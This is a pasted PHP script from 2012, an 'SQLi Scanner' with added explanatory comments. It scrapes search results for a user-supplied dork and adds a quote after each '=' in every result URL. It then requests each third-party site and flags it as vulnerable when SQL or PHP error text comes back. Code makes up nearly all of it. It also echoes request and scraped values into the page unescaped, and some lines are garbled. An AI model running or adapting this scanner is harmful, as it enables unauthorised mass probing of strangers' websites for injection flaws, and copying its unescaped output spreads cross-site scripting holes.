Googleinurl

m0bil3_xT's SQLi Scanner PHP

Sep 5th, 2012
  1. <php
  2. <html>
  3. <head>
  4. <title>m0bil3_xT's SQLi Scanner</title>
  5.  
  6. <center><img src="http://i.imgur.com/lH3GO.png">
  7. </center>
  8.  
  9. </head>
  10. <body bgcolor=#000000>
  11.  
  12. <style>
  13. body{
  14. font: 10pt Verdana;
  15. }
  16. tr {
  17. BORDER-RIGHT: #3e3e3e 1px solid;
  18. BORDER-TOP: #3e3e3e 1px solid;
  19. BORDER-LEFT: #3e3e3e 1px solid;
  20. BORDER-BOTTOM: #3e3e3e 1px solid;
  21. color: #ff9900;
  22. }
  23. td {
  24. BORDER-RIGHT: #3e3e3e 1px solid;
  25. BORDER-TOP: #3e3e3e 1px solid;
  26. BORDER-LEFT: #3e3e3e 1px solid;
  27. BORDER-BOTTOM: #3e3e3e 1px solid;
  28. color: #2BA8EC;
  29. font: 10pt Verdana;
  30. }
  31.  
  32. table {
  33. BORDER-RIGHT: #3e3e3e 1px solid;
  34. BORDER-TOP: #3e3e3e 1px solid;
  35. BORDER-LEFT: #3e3e3e 1px solid;
  36. BORDER-BOTTOM: #3e3e3e 1px solid;
  37. BACKGROUND-COLOR: #111;
  38. }
  39.  
  40.  
  41. input {
  42. BORDER-RIGHT: #3e3e3e 1px solid;
  43. BORDER-TOP: #3e3e3e 1px solid;
  44. BORDER-LEFT: #3e3e3e 1px solid;
  45. BORDER-BOTTOM: #3e3e3e 1px solid;
  46. BACKGROUND-COLOR: Black;
  47. font: 10pt Verdana;
  48. color: #ff9900;
  49. }
  50.  
  51. input.submit {
  52. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  53. color: #FFFFFF;
  54. border-color: #009900;
  55. }
  56.  
  57. code {
  58. border   : dashed 0px #333;
  59. BACKGROUND-COLOR: Black;
  60. font: 10pt Verdana bold;
  61. color: while;
  62. }
  63.  
  64. run {
  65. border   : dashed 0px #333;
  66. font: 10pt Verdana bold;
  67. color: #FF00AA;
  68. }
  69.  
  70. textarea {
  71. BORDER-RIGHT: #3e3e3e 1px solid;
  72. BORDER-TOP: #3e3e3e 1px solid;
  73. BORDER-LEFT: #3e3e3e 1px solid;
  74. BORDER-BOTTOM: #3e3e3e 1px solid;
  75. BACKGROUND-COLOR: #1b1b1b;
  76. font: Fixedsys bold;
  77. color: #aaa;
  78. }
  79. A:link {
  80. COLOR: #2BA8EC; TEXT-DECORATION: none
  81. }
  82. A:visited {
  83. COLOR: #2BA8EC; TEXT-DECORATION: none
  84. }
  85. A:hover {
  86. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  87. color: #ff9900; TEXT-DECORATION: none
  88. }
  89. A:active {
  90. color: Red; TEXT-DECORATION: none
  91. }
  92.  
  93. .listdir tr:hover{
  94. background: #444;
  95. }
  96. .listdir tr:hover td{
  97. background: #444;
  98. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  99. color: #FFFFFF; TEXT-DECORATION: none;
  100. }
  101. .notline{
  102. background: #111;
  103. }
  104. .line{
  105. background: #222;
  106. }
  107. </style>
  108.  
  109. <center>
  110. <br/>
  111.  
  112. <?php
       // Flat script behind the form below: it takes a search query ("dork") from
       // POST, pages through a search front-end, rewrites each result URL and labels
       // it by whether the response body contains database or PHP error text.
       // Defensive reading: the signal it keys on is error output reaching clients,
       // so parameterised queries plus suppressed error display remove both the
       // underlying flaw and the fingerprint this script looks for.
  113.  
       // Banner markup only; no request data is interpolated into this string.
  114. echo "<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0,
  115.  
  116. 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;' size='5'> </font><br><font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px
  117.  
  118. rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'
  119.  
  120. size='5'></font></b><br><br><center><a href='
  121.  
  122. target='_blank'></a><br><a</a></center><br></font><center><font style='text-shadow: 0px 0px 6px rgb(255, 0,
  123.  
  124. 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff;
  125.  
  126. font-weight:bold;' size='2'></font><br><br></center>";
  127.  
       // Client address as seen by the web server, printed back into the page.
  128. $your_ip    = $_SERVER['REMOTE_ADDR'];
  129. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
  130.  
  131. size='2'>Your IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
  132.  
  133. font-weight:bold;' color=#FF0000 size='2'>$your_ip</font><br>";
  134.  
       // Resolves the Host header; '@' hides resolver warnings. The header is
       // client-supplied and gethostbyname() returns its argument unchanged when
       // the lookup fails, so the value echoed below is not guaranteed to be an IP
       // and is written into the HTML without escaping.
  135. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  136. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
  137.  
  138. size='2'>Server IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
  139.  
  140. font-weight:bold;' color=#FF0000 size='2'>$server_ip </font><br><br>";
  141.  
       // Single-field form that posts 'dork' and 'scan' back to this same script.
  142. echo '<form method="post" action=""><font color="red">Dork :</font> <input type="text"
  143.  
  144. value="" name="dork" size="20"/><input type="submit" name="scan"
  145.  
  146. value="Scan"></form></center>';
  147.  
       // Buffering is started so the ob_flush()/flush() pairs further down can
       // stream each result line; set_time_limit(0) removes the execution time limit.
  148. ob_start();
  149. set_time_limit(0);
  150.  
       // Runs only when the submit field is present. No authentication or
       // request-origin check is visible in this script, so anyone who can reach the
       // page can start a run (relevant when this file turns up on a server).
  151. if (isset($_POST['scan'])) {
  152.  
       // Captured here but not what is sent: both CURLOPT_USERAGENT calls below pass
       // the single-quoted literal '$browser)', so outbound requests carry that exact
       // string as their User-Agent, which makes it a usable log signature.
  153. $browser = $_SERVER['HTTP_USER_AGENT'];
  154.  
       // Search front-end URL pieces (no scheme given) and the pattern that pulls
       // result hrefs out of its HTML.
  155. $first = "startgoogle.startpagina.nl/index.php?q=";
  156. $sec = "&start=";
  157. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
  158.  
       // 31 result pages: offsets 0 through 300 in steps of 10.
  159. for($id=0 ; $id<=30; $id++){
  160. $page=$id*10;
  161. $dork=urlencode($_POST['dork']);
  162. $url = $first.$dork.$sec.$page;
  163.  
       // Fetch one results page; no timeout is set on this handle.
  164. $curl = curl_init($url);
  165. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  166. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  167. $result = curl_exec($curl);
  168. curl_close($curl);
  169.  
       // curl_exec() returns false on failure; that case is not checked before matching.
  170. preg_match_all($reg,$result,$matches);
  171.  
       // One outbound request per scraped link.
  172. foreach($matches[1] as $site){
  173.  
       // Every '=' in the scraped URL is followed by an added single quote. In the
       // receiving site's access logs this appears as query strings with a quote
       // character directly after each '='.
  174. $url = preg_replace("/=/", "='", $site);
       // Second handle, with a 5-second timeout (passed as a string).
  175. $curl=curl_init();
  176. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  177. curl_setopt($curl,CURLOPT_URL,$url);
  178. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  179. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
  180. $GET=curl_exec($curl);
       // Classification rests entirely on the response body matching one of these
       // error strings (case-insensitive). Alternatives such as "Syntax error" and
       // "Fatal error" are not SQL-specific, so a "Found" line is a hint, not proof.
       // As shown on this page the pattern spans several lines and contains the text
       // "&#8203;"; whether that is in the original or a paste artefact cannot be
       // told from here.
  181. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute
  182.  
  183. query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row
  184.  
  185. ()|SELECT *
  186.  
  187. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
       // $url derives from third-party HTML and is concatenated into an href and
       // into link text without escaping.
  188. echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'"
  189.  
  190. target="_blank">'.$url.'</a><font color=#FF0000> &#60;-- SQLI Vuln
  191.  
  192. Found..</font></b></center>';
       // Push the line to the browser immediately instead of waiting for the run to end.
  193. ob_flush();flush();
  194. }else{
       // Same unescaped output of $url on the negative branch.
  195. echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16">
  196.  
  197. &#60;-- Not Vuln</font></center>';
  198. ob_flush();flush();
  199. }
  200.  
  201. ob_flush();flush();
  202. }
  203. ob_flush();flush();
  204. }
  205. ob_flush();flush();
  206. }
  207.  
  208. ?>
  209. </body>
  210. </html>